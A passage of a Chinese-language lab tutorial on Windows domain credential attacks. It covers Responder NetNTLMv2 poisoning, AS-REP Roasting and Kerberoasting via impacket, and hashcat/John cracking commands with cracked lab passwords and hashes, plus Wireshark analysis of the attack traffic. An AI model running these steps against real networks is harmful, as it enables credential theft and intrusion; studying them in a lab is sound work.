THREE-PC$:1107:aad3b435b51404eeaad3b435b51404ee:9b0728769dc8342ae1e934c91aa9b9b2:::
WIN-BLTKDCAFMQ7$:1109:aad3b435b51404eeaad3b435b51404ee:e6eed8a106839d302db37e1c4ff746be:::

那么可以尝试用 Hashcat 进行破解(前提是你的字典中包含了用户明文):

# Crack with Hashcat
hashcat -m 1000 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
9b6527a2fa104886453b3b75bc0da9d6:Hello1234
465590ccb4be6340bc749c34dfc34630:Hello33

secretsdump 对应的攻击流量如下:

NetNTLMv2 - Responder 中继攻击

如果你通过 Responder 中继获取了 NetNTLM Hash:

python Responder.py -I eth1
-----
[*] [NBT-NS] Poisoned answer sent to 192.168.111.149 for name WIN-TEST (service: File Server)
[SMB] NTLMv2-SSP Client   : 192.168.111.149
[SMB] NTLMv2-SSP Username : NPC\three
[SMB] NTLMv2-SSP Hash     : three::NPC:34207bdf6b647508:8BF9BA0D91C9ECE661F85DB265827F6C:010100000000000000FF4C22592EDB01CDC48851320D734400000000020008003800320055004B0001001E00570049004E002D00500032004A0046004C0059004200530033004A00540004003400570049004E002D00500032004A0046004C0059004200530033004A0054002E003800320055004B002E004C004F00430041004C00030014003800320055004B002E004C004F00430041004C00050014003800320055004B002E004C004F00430041004C000700080000FF4C22592EDB0106000400020000000800300030000000000000000000000000200000EFF549B930E2E1F7888F504BE4F66361AFCD6B6D63B5B038A247964C9E3EC2730A0010000000000000000000000000000000000009001A0063006900660073002F00770069006E002D007400650073007400000000000000000000000000

那么可以尝试用 Hashcat 进行破解(前提是你的字典中包含了用户明文):

# Crack with Hashcat
hashcat -m 5600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

客户端向域控发起认证的对应流量如下,如果只有流量包,也可以从中提取 Challenge、Response 和 Hash,进行组装:

# username::domain:challenge:HMAC-MD5:blob

Kerberos Hash 破解 - Hash Cracking with Kerberos

Kerberos 配置 - Infrastructure

Kerberos 环境搭建

在进行实验之前,需要搭建 Kerberos 环境,并配置一些域内利用方式的前置条件:

# DOMAIN
NPC.COM

# DC
[ip addr]  192.168.111.146 
[username] npc.com/Administrator
[password] Hello1234 # can be cracked with rockyou.txt

# THREE-PC
[ip addr]  192.168.111.149 
[username] npc.com/three
[password] Hello123 # can be cracked with rockyou.txt

Kerberos 认证流程

Kerberos 认证流程简化如下:

  1. AS_REQ:客户端向 KDC(通常是域控)的 AS 请求 TGT。
  2. AS_REP:身份认证通过后 KDC 发放 TGT。
  3. TGS_REQ:客户端用 TGT 向 KDC 请求 ST。ST 由 TGS 提供。
  4. TGS_REP:身份认证通过后 KDC 发放 ST。
  5. AP_REQ:客户端使用 ST 访问服务。
  6. verify_PAC_REQ(可选):如果需要校验 PAC_PRIVSVR_CHECKSUM 签名,服务需要将客户端发来的 ST 中的 PAC 签名发给 KDC 进行校验。
  7. PAC_verified_REP(可选):返回校验结果。
  8. AP-REP(可选):双向认证后的服务端返回服务资源给客户端。

术语:

  • DC:Domain Controller,域控。
  • KDC:Key Distributed Center,密钥分发中心,整个安全认证过程的票据生成管理服务,其中包含两个服务,AS 和 TGS。
  • AD:Active Directory,活动目录,包含域内用户数据库。
  • AS:Kerberos Authentication Service,Kerberos 认证服务。
  • TGT :Ticket Granting Ticket,TGT 服务票据,由 AS 服务发放。
  • TGS:Ticket Granting Server,票据授予服务。
  • ST:Server Ticket,ST 服务票据,由 TGS 服务发放。
  • SPN:Service Principal Name,服务主体名称。Kerberos 客户端用于唯一标识给特定 Kerberos 目标计算机的服务实例名称。

配置 AS-REP Roasting 前置条件

AS-REP Roasting 攻击的前置条件:

  • 域用户勾选”不需要 Kerberos 预身份验证“选项

所以,我们需要设置某个域用户“不需要 Kerberos 预身份验证”(Do not require Kerberos pre-authentication),此处对域用户 three 进行配置:

1. 打开 Active Directory 用户和计算机管理工具;
2. 点击相应的 OU(组织单位),找到要修改的用户账户,例如 three;
3. 右键点击用户账户,选择“属性”,点击“账户”选项卡,在账户选项部分勾选“不要求 Kerberos 预身份验证”;
4. 点击应用。

配置 Kerberoasting 前置条件

Kerberoasting 攻击的前置条件:

  • 一个在域中注册了 SPN 的服务

所以,我们需要配置一个服务并注册 SPN。以 IIS 服务为例(也可以是其他服务):

1. 打开服务器管理器,在仪表盘中选择“添加角色”,勾选“Web 服务器(IIS)”并安装管理工具;
2. 在服务器管理器中,选择“角色”->“Web 服务器(IIS)”->“Internet 信息服务 (IIS) 管理器”,添加网站并配置,例如添加网站 test;
3. 点击 test,选择身份验证,启用“Windows 身份验证”,禁用“匿名身份验证”。
4. 配置 SPN
    setspn -s HTTP/npc.com npc\three
5. 查询 SPN
    setspn -L three

进行测试,访问目标网站,需要认证则配置完成:

基本结构 - Hash Format

与 Kerberos 相关的 Hash 结构及示例:

# Sample password hash encoding strings in kerberos
$krb5pa: Kerberos 5, AS-REQ Pre-Auth
$krb5: Kerberos 5, TGT
$krb5asrep: Kerberos 5, AS-REP
$krb5tgs: Kerberos 5, TGS-REP

Hashcat 可破解的格式示例:

# https://hashcat.net/wiki/doku.php?id=example_hashes
# The password for all example hashes is hashcat.
# [Kerberos 5 Pre-Auth] hashcat
# 7500  Kerberos 5, etype 23, AS-REQ Pre-Auth
# $krb5pa$23$<username>$<realm>$<salt>$<hash>
$krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363631363132333238383835
# 19800 Kerberos 5, etype 17, Pre-Auth  
# $krb5pa$17$<username>$<realm>$<hash>
$krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333
# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770

# [Kerberos 5 AS-REP] hashcat
# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
$krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac

# [Kerberos 5 TGS-REP] hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) 
# $krb5tgs$17$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$17$user$realm$ae8434177efd09be5bc2eff8$90b4ce5b266821adc26c64f71958a475cf9348fce65096190be04f8430c4e0d554c86dd7ad29c275f9e8f15d2dab4565a3d6e21e449dc2f88e52ea0402c7170ba74f4af037c5d7f8db6d53018a564ab590fc23aa1134788bcc4a55f69ec13c0a083291a96b41bffb978f5a160b7edc828382d11aacd89b5a1bfa710b0e591b190bff9062eace4d26187777db358e70efd26df9c9312dbeef20b1ee0d823d4e71b8f1d00d91ea017459c27c32dc20e451ea6278be63cdd512ce656357c942b95438228e
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) 
# $krb5tgs$18$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$18$user$realm$8efd91bb01cc69dd07e46009$7352410d6aafd72c64972a66058b02aa1c28ac580ba41137d5a170467f06f17faf5dfb3f95ecf4fad74821fdc7e63a3195573f45f962f86942cb24255e544ad8d05178d560f683a3f59ce94e82c8e724a3af0160be549b472dd83e6b80733ad349973885e9082617294c6cbbea92349671883eaf068d7f5dcfc0405d97fda27435082b82b24f3be27f06c19354bf32066933312c770424eb6143674756243c1bde78ee3294792dcc49008a1b54f32ec5d5695f899946d42a67ce2fb1c227cb1d2004c0

John the ripper 可破解的格式示例:

# https://openwall.info/wiki/john/sample-hashes
# or command: john --list=format-details
# [Kerberos 5 AS-REQ Pre-Auth] 
# krb5pa-sha1: Kerberos 5 AS-REQ Pre-Auth etype 17/18
krb5pa$18$user1$EXAMPLE.COM$$2a0e68168d1eac344da458599c3a2b33ff326a061449fcbc242b212504e484d45903c6a16e2d593912f56c93883bf697b325193d62a8be9c
# krb5pa-md5: Kerberos 5 AS-REQ Pre-Auth etype 23
$krb5pa$23$user$realm$salt$afcbe07c32c3450b37d0f2516354570fe7d3e78f829e77cdc1718adf612156507181f7daeb03b6fbcfe91f8346f3c0ae7e8abfe5
# krb5: Kerberos v5 TGT
$krb5$oskov$ACM.UIUC.EDU$4730d7249765615d6f3652321c4fb76d09fb9cd06faeb0c31b8737f9fdfcde4bd4259c31cb1dff25df39173b09abdff08373302d99ac09802a290915243d9f0ea0313fdedc7f8d1fae0d9df8f0ee6233818d317f03a72c2e77b480b2bc50d1ca14fba85133ea00e472c50dbc825291e2853bd60a969ddb69dae35b604b34ea2c2265a4ffc72e9fb811da17c7f2887ccb17e2f87cd1f6c28a9afc0c083a9356a9ee2a28d2e4a01fc7ea90cc8836b8e25650c3a1409b811d0bad42a59aa418143291d42d7b1e6cb5b1876a4cc758d721323a762e943f774630385c9faa68df6f3a94422f97
# krb5asrep: Kerberos 5 AS-REP etype 17/18/23
63B386C8C75ECD10F9DF354F42427FBF$BB46B57E89D878455743D1E4C2CD871B5A526A130595463CC021510BA476247B8F9431505155CBC3D7E6120E93623E083A6A508111937607B73F8F524C23E482B648A9C1BE74D7B72B230711BF405ACE9CAF01D5FAC0304509F0DE2A43E0A0834D5F4D5683CA1B8164359B28AC91B35025158A6C9AAD2585D54BAA0A7D886AC154A0B00BE77E86F25439B2298E9EDA7D4BCBE84F505C6C4E6477BB2C9FF860D80E69E99F83A8D1205743CCDD7EC3C3B8FEC481FCC688EC3BD4BA60D93EB30A3259B2E9542CC281B25061D298F672009DCCE9DCAF47BB296480F941AFCDA533F13EA99739F97B92C971A7B4FB970F
# krb5tgs: Kerberos 5 TGS etype 23
$krb5tgs$23$74809c4c83c3c8279c6058d2f206ec2f$78b4bbd4d229487d5afc9a6050d4144ce10e9245cdfc0df542879814ce740cebb970ee820677041596d7e55836a18cc95c04169e7c74a4a22ae94e66f3d37150e26cc9cb99e189ef54feb7a40a8db2cb2c41db80d8927c74da7b33b52c58742d2109036b8ab27184609e7adff27b8f17b2f2a7b7d85e4ad532d8a70d48685a4390a9fc7a0ab47fd17334534d795abf83462f0db3de931c6a2d5988ab5bf3253facfff1381afb192ce385511c9052f2915ffdb7ea28a1bbad0573d9071e79dc15068527d50100de8813793a15c292f145fa3797ba86f373a4f0a05e5f2ec7dbfd8c8b5139cc7fbb098ea1dd91a7440134ffe2aff7174d0df13dcad82c81c680a70127a3ec8792bdecd74a878f97ff2b21277dc8c9a2f7bbcd9f72560dd933d85585259067d45a46a6f505d03f188b62c37edf03f117503a26743ebd674d5b07324c15fc8418881613b365402e0176da97d43cf85e8239b69aee07791233a959bcaf83a7f492fa718dd0a1747eaf5ce626eb11bda89e8235a056e2721f45c3b61442d893ef32a8c192ea0dadb853f3c6f3c75e92$SOURCE_HASH$34c4849062f4b75b1e3f2a6e0f463fa0

示例及破解 - Examples and Cracking

Kerberos AS-REQ Pre-Auth - $krb5pa

# [Kerberos 5 Pre-Auth] hashcat
# 7500  Kerberos 5, etype 23, AS-REQ Pre-Auth
# $krb5pa$23$<username>$<realm>$<salt>$<hash>
$krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363631363132333238383835
# 19800 Kerberos 5, etype 17, Pre-Auth  
# $krb5pa$17$<username>$<realm>$<hash>
$krb5pa$17$hashcat$HASHCATDOMAIN.COM$a17776abe5383236c58582f515843e029ecbff43706d177651b7b6cdb2713b17597ddb35b1c9c470c281589fd1d51cca125414d19e40e333
# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770

# Crack with Hashcat
hashcat -m 7500 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5pa$23$user$realm$salt$034acfc70afba542690b8bc912fcd7fed6a848493a3ff0d7af641a263b71dcc72902995df4085ba458b733d8092e6b348e3e3990:frank
-----
hashcat -m 19900 -a 0 hashes.txt password_10w.txt --show
$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770:hashcat

# Crack with John the ripper
# krb5pa-sha1: Kerberos 5 AS-REQ Pre-Auth etype 17/18
krb5pa$18$user1$EXAMPLE.COM$$2a0e68168d1eac344da458599c3a2b33ff326a061449fcbc242b212504e484d45903c6a16e2d593912f56c93883bf697b325193d62a8be9c
# krb5pa-md5: Kerberos 5 AS-REQ Pre-Auth etype 23
$krb5pa$23$user$realm$salt$afcbe07c32c3450b37d0f2516354570fe7d3e78f829e77cdc1718adf612156507181f7daeb03b6fbcfe91f8346f3c0ae7e8abfe5
john --wordlist=~/HackTools/Dict/rockyou.txt --format=krb5pa-md5 hashes.txt
john hashes.txt --show
?:John

Kerberos AS-REP - $krb5asrep

# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG:58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437

# Crack with Hashcat
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG:58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437:Adm12geC

# Crack with John the ripper
# 58f5daa35b023bedcd992977d0918e72$1f8454f8342afbfab303143aab7ef1abc15adad29062e34674fd7293716fa69051ed168dd90afcdc4c91cde9c44e56c0fd8d015ae019478e3d511ad9cccba01d4535a7756207148eac8793346d827b7d95d0158bdad1688b3e11c656bb992a64a2d871afe3c0800c32a1f5f1272a82345f71147d80c269b73d83e46cb81bf3c80149c9494a24a4f97b56f9e89d2bc32c89892dff960961efb782caeaa6d093eff542e57adc1fa222048f0c1a1a8fa3da7053c3a68d094ad64612bdb7f4e55c900105e3fcf2449ec7aab1927f3a2cf2f21aaaa6804055c85d11f599d651085c22ea944b5db0733437
john --wordlist=~/HackTools/Dict/rockyou.txt --format=krb5asrep hashes.txt
john hashes.txt --show
?:Adm12geC

Kerberos TGS-REP - $krb5tgs

# [Kerberos 5 TGS-REP] hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96) 
# $krb5tgs$17$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$17$user$realm$ae8434177efd09be5bc2eff8$90b4ce5b266821adc26c64f71958a475cf9348fce65096190be04f8430c4e0d554c86dd7ad29c275f9e8f15d2dab4565a3d6e21e449dc2f88e52ea0402c7170ba74f4af037c5d7f8db6d53018a564ab590fc23aa1134788bcc4a55f69ec13c0a083291a96b41bffb978f5a160b7edc828382d11aacd89b5a1bfa710b0e591b190bff9062eace4d26187777db358e70efd26df9c9312dbeef20b1ee0d823d4e71b8f1d00d91ea017459c27c32dc20e451ea6278be63cdd512ce656357c942b95438228e
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96) 
# $krb5tgs$18$<username>$<realm>$hash[:24]$hash[24:]
$krb5tgs$18$user$realm$8efd91bb01cc69dd07e46009$7352410d6aafd72c64972a66058b02aa1c28ac580ba41137d5a170467f06f17faf5dfb3f95ecf4fad74821fdc7e63a3195573f45f962f86942cb24255e544ad8d05178d560f683a3f59ce94e82c8e724a3af0160be549b472dd83e6b80733ad349973885e9082617294c6cbbea92349671883eaf068d7f5dcfc0405d97fda27435082b82b24f3be27f06c19354bf32066933312c770424eb6143674756243c1bde78ee3294792dcc49008a1b54f32ec5d5695f899946d42a67ce2fb1c227cb1d2004c0

# Crack with Hashcat
# 13100 Kerberos 5, etype 23, TGS-REP
hashcat -m 13100 -a 0 hashes.txt ~/HackTools/Dict/dic.txt --show
$krb5tgs$23$*user$realm$test/spn*$63386d22d359fe42230300d56852c9eb$891ad31d09ab89c6b3b8c5e5de6c06a7f49fd559d7a9a3c32576c8fedf705376cea582ab5938f7fc8bc741acf05c5990741b36ef4311fe3562a41b70a4ec6ecba849905f2385bb3799d92499909658c7287c49160276bca0006c350b0db4fd387adc27c01e9e9ad0c20ed53a7e6356dee2452e35eca2a6a1d1432796fc5c19d068978df74d3d0baf35c77de12456bf1144b6a750d11f55805f5a16ece2975246e2d026dce997fba34ac8757312e9e4e6272de35e20d52fb668c5ed:hashcat
# 19600 Kerberos 5, etype 17, TGS-REP (AES128-CTS-HMAC-SHA1-96)
hashcat -m 19600 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt
# 19700 Kerberos 5, etype 18, TGS-REP (AES256-CTS-HMAC-SHA1-96)
hashcat -m 19700 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt

# Crack with John the ripper
john hashes.txt --format=krb5tgs --wordlist=~/HackTools/Dict/dic.txt
john hashes.txt --show
?:hashcat

攻击流量分析 - Traffic Analysis

Kerberos AS-REQ Pre-Auth - $krb5pa

Kerberos 预认证阶段流量:

  • 用户名存在且启用:KRB5KDC_ERR_PREAUTH_REQUIRED
  • 用户名存在但禁用:KRB5KDC_ERR_CLIENT_REVOKED NT Status: STATUS_ACCOUNT_DISABLED
  • 用户名不存在:KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN

破解 Kerberos AS-REQ Pre-Auth Hash,需要先确认 etype(加密算法),从 AS-REQ 数据包提取 cipher(Hash),从 AS-REP 数据包中提取 username(用户名) 和 realm(域名),按以下格式进行组装:

# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>

过滤 Kerberos AS-REQ 流量:

# Wireshark Filter PA Data (Pre-Authentication Data)
_ws.col.info == "AS-REQ"

从 AS-REQ 数据包提取 cipher:

as-req
    pvno: 5
    msg-type: krb-as-req (10)
    padata: 2 items
        PA-DATA pA-ENC-TIMESTAMP
            padata-type: pA-ENC-TIMESTAMP (2)
                padata-value: 3041a003020112a23a043828b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
                    etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)
                    cipher: 28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
        PA-DATA pA-PAC-REQUEST
            padata-type: pA-PAC-REQUEST (128)
                padata-value: 3005a0030101ff
                    include-pac: True
    req-body

从 AS-REP 数据包中提取用户名和域名:

as-rep
    pvno: 5
    msg-type: krb-as-rep (11)
    padata: 1 item
    crealm: NPC.COM
    cname
        name-type: kRB5-NT-PRINCIPAL (1)
        cname-string: 1 item
            CNameString: three
    ticket
        tkt-vno: 5
        realm: NPC.COM
        sname
            name-type: kRB5-NT-SRV-INST (2)
            sname-string: 2 items
                SNameString: krbtgt
                SNameString: NPC.COM
        enc-part
            etype: eTYPE-ARCFOUR-HMAC-MD5 (23)
            kvno: 2
            cipher […]: 6bf7e6fc3f91d70c3e839c8c4ceec3e8fe3be842e51f25b15937a37eb4573e6b8cf635947f216c4b43cf5671dca5208284a0f02a788fdd2df65e4bf4a2b8521713b2b458cc106457eb80375b371e837cc5b006f03d3712e0cc9a587825ba3add0db387a419869dc230f2199caa52376f9
    enc-part

组装成可破解的 Hash 格式:

# 19900 Kerberos 5, etype 18, Pre-Auth
# $krb5pa$18$<username>$<realm>$<hash>
[etype] 18
[username] three
[realm] NPC.COM
[cipher] 28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
# Crack with Hashcat
$krb5pa$18$three$NPC.COM$28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08
-----
hashcat -m 19900 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt
-----
hashcat -m 19900 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show
$krb5pa$18$three$NPC.COM$28b51bef43423d452b53b344be976cdb34ef58c9750f612026b618da02de566ed1d89c66beb5181db8b9bf1596b4c4418e53cf60498bde08:Hello33

Kerberos AS-REP - $krb5asrep

破解 Kerberos AS-REP Hash,需要先确认 etype(加密算法),从 AS-REP 数据包提取 cipher(Hash)、 username(用户名) 和 realm(域名),按以下格式进行组装(以 etype=23 为例):

# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]

过滤 Kerberos AS-REP 流量:

# Wireshark Filter
_ws.col.info == "AS-REP"

从 AS-REP 数据包中提取 cipher:

组装成可破解的 Hash 格式:

# 18200 Kerberos 5, etype 23, AS-REP
# 18200 Kerberos 5, etype 23, AS-REP
# $krb5asrep$23$<username>@<realm>:hash[:32]$hash[32:]
[etype] 23
[username] three
[realm] NPC.COM
[hash] e71508e45fbb3289bd82066a83a713cac97f506ae47c9ecaaa64d157d34b2ff4ccabe9c2e713b64849db62acd57c3bec7e91f01633d6087305ab09bea29718956333e362bddc0a882880205e8aad984889559c2fcc6772508718a15e3f84093bd7c5c67b04a3412860cc8f05961e292407388d5aae3ca211c6b2441df6397f1ec0410f5803094dbd6daa7fe79e6a4e44d7292c4b9f40197e91c4e14fd6aa44c019b97637690af15a91c86260824c3759a035431a2135b6c8f6b44069901274cc8db557ba8b9cec7795c9ec4174611d9fe98b6bc2b8bb3ced4b3d8dbea8b481ade4216ba11f1b8c5ba25d5411cc8a082d21f5
# Crack with Hashcat
$krb5asrep$23$three@NPC.COM:e71508e45fbb3289bd82066a83a713ca$c97f506ae47c9ecaaa64d157d34b2ff4ccabe9c2e713b64849db62acd57c3bec7e91f01633d6087305ab09bea29718956333e362bddc0a882880205e8aad984889559c2fcc6772508718a15e3f84093bd7c5c67b04a3412860cc8f05961e292407388d5aae3ca211c6b2441df6397f1ec0410f5803094dbd6daa7fe79e6a4e44d7292c4b9f40197e91c4e14fd6aa44c019b97637690af15a91c86260824c3759a035431a2135b6c8f6b44069901274cc8db557ba8b9cec7795c9ec4174611d9fe98b6bc2b8bb3ced4b3d8dbea8b481ade4216ba11f1b8c5ba25d5411cc8a082d21f5
-----
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

AS-REP Roasting 攻击

通过 impacket 获取 AS-REP 响应包中用户 Hash 加密的 login session key:

python GetNPUsers.py -dc-ip 192.168.111.146 -usersfile users.txt npc/
-----
$krb5asrep$23$three@NPC:87697a72bc4eab52bde95f886db2a205$ad364d2ba23564547bea9387beb75e95a3a11db11a555154dea9307956b96e538b8b4b7cc822da450707c2ba51f7a6e124c8a668628a3ed60d38d40b44be89f279927f34e2de5ca3623f0bde2b45f3d9775a27816f5b49ded100cd6686a9ce191b3d503b516b11b8cec6a965c98cd5fb85c17ad812b26fa16ff719729a77432dc4df8903534bb37e09258dc91c41454425ed8d85cd4884fb9b23128eef8c9bc3d95f308f7fa1a13de2a587a5e57f0215144d62121de7c61cb625bcbc6cf387faa053a16fb16ecb1fc6f0652fc3d14ca03879edfa954c3508421299286105

用 Hashcat 进行破解:

# Crack with Hashcat
hashcat -m 18200 -a 0 hashes.txt ~/HackTools/Dict/rockyou.txt --show

枚举用户名不存在时 KRB Error 为 KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN,成功后才会返回 AS-REP 数据包。对应的 AS-REP Roasting 攻击流量如下:

Kerberos TGS-REP - $krb5tgs

破解 Kerberos TGS-REP Hash,需要先确认 etype(加密算法),从 TGS-REP 数据包提取 cipher(Hash)、 username(用户名) 、 realm(域名)和 SPN(服务主题名称),按以下格式进行组装(以 etype=23 为例):

# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]

过滤 Kerberos TGS-REP 流量:

# Wireshark Filter
_ws.col.info == "TGS-REP"

从 TGS-REP 数据包中提取 spn 和 cipher:

组装成可破解的 Hash 格式:

# 13100 Kerberos 5, etype 23, TGS-REP
# $krb5tgs$23$*<username>$<realm>$<spn>*$hash[:32]$hash[32:]
[etype] 23
[username] three
[realm] NPC.COM
[spn] npc.com/three
[hash] 
7e991b6110f0b716bc0d8cdb55baba2b2bcb6a1485d038098b91fcdc335bf149c958571c6d9f8650f946c1cf95c6828fccce957e63fc9da609771bd3c2e3a836dd292fc51d7c6101582dd6362a959a66d0e29dfeea06b313c168ee2fbb323c37a5dd7e4a3e21acb7d8526503cbaf802158d599c646513a80ace8a7c699a7456d46ad6419cbffbf36f602716a155a54d4d98f7d755a83d26950606ecfb276c187821dfa7320aa356c7d03a9165d12b4a04ab70aef9d671692dcc5771eb76d522e9a2367e79a7ac1dbbae333041499e5b6575996810048e85399c90aef3f4820513a554993aa84bbeed7c9dc0128e5ff6ca14811733de29b871fff01d8e487e187f101f64349d357f792072313bacbbd3d3514883b893b20ece25ebd1789af52b97b5f9101976813c8c0859b5abfbaa62c6058701bcd4cc2984320e1cc081f4311b643f13788cb141af9b4002de5a3e78b89200730cfe4d9b8757ec1026fd68423ae3bcfeb7c85a518bb6d7abb1d4414920f093116f1564643eac9a8fb8ba7f3c57f35a7b9e9677ab50f79f7277cebeeb2037ea0865020be8576081d23923cdbe7d7c2075027f9fd092a760cde80c280e3edb988a31c9e48eaa69f9491f11fa6d4c5aa5856af4814b2862579cd8bb3b8952b1e1f6094670ffcfa3879f970054ac2cf9ffc4f0c0a10540bb60850994a12441c2d7bc28821d59b262a2841814c98958eb924280755d73d6668a02058d8dea9081656414a88b7508aeb4cea377fd8ca9a6fa93c43bd6054dbffc4fe1af47b223adc67ba5e1f1ce2ec05b75c71ee69157d3e456759ec2063001e20bc412ff7628734a9a77fd5f1c465a81c55055f06402ed7a05346fffaba87c3965bfcea8f8bf657ba5c2e1dca96ddab1d5b447e5995409460c58eab1def4030ce2e09d6d5b0c1ec1b01ac29670b3fab9b06f16aaebc7bfd89dfe7d1f509f7dae8e129a4b90c98e13559b5401e3531c7b93c14f424f9088033cb8ed9908b6cb113ec1290faa0ef665c0cdcd9fea05376ad5fb3345e1d353ef8d692f12a67282e26757f08d331ef1c6a85f442c0cc2e030e2ff83eccbd039fd0a185f275e23cc1d652d7d8db38e7abdaaf1682c269e8dab81d33a09f605c68d4bdab1a883c80877